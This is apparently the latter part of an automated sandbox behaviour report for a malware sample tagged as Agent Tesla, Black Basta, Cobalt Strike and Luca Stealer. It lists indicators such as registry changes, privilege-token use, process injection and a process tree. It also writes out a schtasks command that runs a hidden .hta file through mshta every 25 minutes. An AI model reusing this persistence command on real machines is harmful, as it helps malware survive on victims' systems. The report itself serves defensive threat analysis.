pid Process 5988 sc.exe 1716 sc.exe 7072 sc.exe 5320 sc.exe 7076 sc.exe 5812 sc.exe 6160 sc.exe 6624 sc.exe 6480 sc.exe 5720 sc.exe 5712 sc.exe 6652 sc.exe 5564 sc.exe 6568 sc.exe 6320 sc.exe 4968 sc.exe 6760 sc.exe 212 sc.exe 5596 sc.exe 3964 sc.exe 6696 sc.exe 5312 sc.exe 6076 sc.exe 7000 sc.exe 5576 sc.exe 6228 sc.exe 3156 sc.exe 5512 sc.exe 6976 sc.exe 2968 sc.exe 4664 sc.exe 5604 sc.exe 6136 sc.exe 5292 sc.exe 4760 sc.exe 1944 sc.exe 6676 sc.exe 6292 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1444 1648 WerFault.exe 147 -
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 60578b2a60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dat2C09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KRWXARXD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PQPYAYJJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LXUZVRLG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 04214d2864.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dat90FE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEYKSCXV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5316 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" dat90FE.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Abspawnhlp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dat2C09.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" dat90FE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" dat2C09.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dat90FE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" dat90FE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dat2C09.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Abspawnhlp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Abspawnhlp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings Abspawnhlp.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4120 schtasks.exe 3236 schtasks.exe 1580 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 6844 CamMenuMaker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 228 powershell.exe 228 powershell.exe 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 752 rapes.exe 752 rapes.exe 4792 MSBuild.exe 4792 MSBuild.exe 4792 MSBuild.exe 4792 MSBuild.exe 3684 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 2224 rapes.exe 2224 rapes.exe 1528 MSBuild.exe 1528 MSBuild.exe 1528 MSBuild.exe 1528 MSBuild.exe 1952 msiexec.exe 1952 msiexec.exe 4656 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2752 cmd.exe 2752 cmd.exe 2752 cmd.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 1952 msiexec.exe 1952 msiexec.exe 1244 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4408 rapes.exe 4408 rapes.exe 1952 msiexec.exe 1952 msiexec.exe 916 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 4912 CamMenuMaker.exe 3852 CamMenuMaker.exe 2480 Abspawnhlp.exe 3436 Abspawnhlp.exe 4292 CamMenuMaker.exe 4912 CamMenuMaker.exe 2868 Abspawnhlp.exe 2868 Abspawnhlp.exe 3852 CamMenuMaker.exe 4292 CamMenuMaker.exe 6928 Abspawnhlp.exe 6928 Abspawnhlp.exe 2868 Abspawnhlp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 1212 NHq7LaU.exe Token: SeDebugPrivilege 2776 chrome.exe Token: SeShutdownPrivilege 2756 msiexec.exe Token: SeIncreaseQuotaPrivilege 2756 msiexec.exe Token: SeSecurityPrivilege 1952 msiexec.exe Token: SeCreateTokenPrivilege 2756 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2756 msiexec.exe Token: SeLockMemoryPrivilege 2756 msiexec.exe Token: SeIncreaseQuotaPrivilege 2756 msiexec.exe Token: SeMachineAccountPrivilege 2756 msiexec.exe Token: SeTcbPrivilege 2756 msiexec.exe Token: SeSecurityPrivilege 2756 msiexec.exe Token: SeTakeOwnershipPrivilege 2756 msiexec.exe Token: SeLoadDriverPrivilege 2756 msiexec.exe Token: SeSystemProfilePrivilege 2756 msiexec.exe Token: SeSystemtimePrivilege 2756 msiexec.exe Token: SeProfSingleProcessPrivilege 2756 msiexec.exe Token: SeIncBasePriorityPrivilege 2756 msiexec.exe Token: SeCreatePagefilePrivilege 2756 msiexec.exe Token: SeCreatePermanentPrivilege 2756 msiexec.exe Token: SeBackupPrivilege 2756 msiexec.exe Token: SeRestorePrivilege 2756 msiexec.exe Token: SeShutdownPrivilege 2756 msiexec.exe Token: SeDebugPrivilege 2756 msiexec.exe Token: SeAuditPrivilege 2756 msiexec.exe Token: SeSystemEnvironmentPrivilege 2756 msiexec.exe Token: SeChangeNotifyPrivilege 2756 msiexec.exe Token: SeRemoteShutdownPrivilege 2756 msiexec.exe Token: SeUndockPrivilege 2756 msiexec.exe Token: SeSyncAgentPrivilege 2756 msiexec.exe Token: SeEnableDelegationPrivilege 2756 msiexec.exe Token: SeManageVolumePrivilege 2756 msiexec.exe Token: SeImpersonatePrivilege 2756 msiexec.exe Token: SeCreateGlobalPrivilege 2756 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2776 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2876 wrote to memory of 4352 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2876 wrote to memory of 4352 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2876 wrote to memory of 4352 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2876 wrote to memory of 4636 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 2876 wrote to memory of 4636 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 2876 wrote to memory of 4636 2876 2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 4352 wrote to memory of 4120 4352 cmd.exe 91 PID 4352 wrote to memory of 4120 4352 cmd.exe 91 PID 4352 wrote to memory of 4120 4352 cmd.exe 91 PID 4636 wrote to memory of 228 4636 mshta.exe 94 PID 4636 wrote to memory of 228 4636 mshta.exe 94 PID 4636 wrote to memory of 228 4636 mshta.exe 94 PID 228 wrote to memory of 3728 228 powershell.exe 103 PID 228 wrote to memory of 3728 228 powershell.exe 103 PID 228 wrote to memory of 3728 228 powershell.exe 103 PID 3728 wrote to memory of 752 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 104 PID 3728 wrote to memory of 752 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 104 PID 3728 wrote to memory of 752 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 104 PID 752 wrote to memory of 3672 752 rapes.exe 108 PID 752 wrote to memory of 3672 752 rapes.exe 108 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 3672 wrote to memory of 4792 3672 XOPPRUc.exe 109 PID 752 wrote to memory of 3652 752 rapes.exe 110 PID 752 wrote to memory of 3652 752 rapes.exe 110 PID 752 wrote to memory of 3652 752 rapes.exe 110 PID 3652 wrote to memory of 3684 3652 PQPYAYJJ.exe 111 PID 3652 wrote to memory of 3684 3652 PQPYAYJJ.exe 111 PID 3652 wrote to memory of 3684 3652 PQPYAYJJ.exe 111 PID 3684 wrote to memory of 3892 3684 Abspawnhlp.exe 112 PID 3684 wrote to memory of 3892 3684 Abspawnhlp.exe 112 PID 3684 wrote to memory of 3892 3684 Abspawnhlp.exe 112 PID 752 wrote to memory of 1444 752 rapes.exe 114 PID 752 wrote to memory of 1444 752 rapes.exe 114 PID 1444 wrote to memory of 3236 1444 h8NlU62.exe 115 PID 1444 wrote to memory of 3236 1444 h8NlU62.exe 115 PID 1444 wrote to memory of 3236 1444 h8NlU62.exe 115 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 1444 wrote to memory of 1528 1444 h8NlU62.exe 116 PID 3892 wrote to memory of 2060 3892 Abspawnhlp.exe 118 PID 3892 wrote to memory of 2060 3892 Abspawnhlp.exe 118 PID 3892 wrote to memory of 2060 3892 Abspawnhlp.exe 118 PID 3892 wrote to memory of 2060 3892 Abspawnhlp.exe 118 PID 3892 wrote to memory of 2060 3892 Abspawnhlp.exe 118 PID 3892 wrote to memory of 2752 3892 Abspawnhlp.exe 122 PID 3892 wrote to memory of 2752 3892 Abspawnhlp.exe 122 PID 3892 wrote to memory of 2752 3892 Abspawnhlp.exe 122 PID 752 wrote to memory of 1212 752 rapes.exe 124 PID 752 wrote to memory of 1212 752 rapes.exe 124 PID 1212 wrote to memory of 3236 1212 NHq7LaU.exe 128 PID 1212 wrote to memory of 3236 1212 NHq7LaU.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3004
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4416
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn WIjBTma5e3B /tr "mshta C:\Users\Admin\AppData\Local\Temp\p6jdEd9yb.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn WIjBTma5e3B /tr "mshta C:\Users\Admin\AppData\Local\Temp\p6jdEd9yb.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4120
-
-
-
